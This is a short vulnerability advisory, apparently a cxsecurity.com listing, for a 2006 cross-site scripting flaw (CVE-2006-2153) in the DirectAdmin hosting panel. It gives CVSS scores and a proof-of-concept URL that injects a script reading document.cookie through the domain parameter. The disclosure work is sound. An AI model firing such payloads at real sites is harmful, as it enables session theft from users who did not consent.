Bug: XSS Attack On DirectAdmin Hosting Managment ( Ascii Version )

Search:
WLB2

XSS Attack On DirectAdmin Hosting Managment

Published
Credit
Risk
2006.05.04
outlaw aria-security net
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2006-2153
Yes
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''

#Aria-Security.net Advisory

#Discovered by: O.U.T.L.A.W

#Outlaw (at) aria-security (dot) net [email concealed]

#Gr33t to:A.u.r.a & R@1D3N & Cl0wn & Dtrap

#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''

? Software: DirectAdmin

? Support Website: http://www.Directadmin.com

? advisory:http://www.aria-security.net/advisory/hm/directadmin.txt

? Summary: DirectAdmin Is A Hosting Managment System

? Tested On: http://www.directadmin.com/demo.html

? Proof of Concept:

LOCAL XSS attack:

http://www.directadmin.com:2222/HTM_PASSWD?domain=".><script>alert(docum
ent.cookie)</script><!--

?Solution:

?contact advisory (at) aria-security (dot) net [email concealed]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version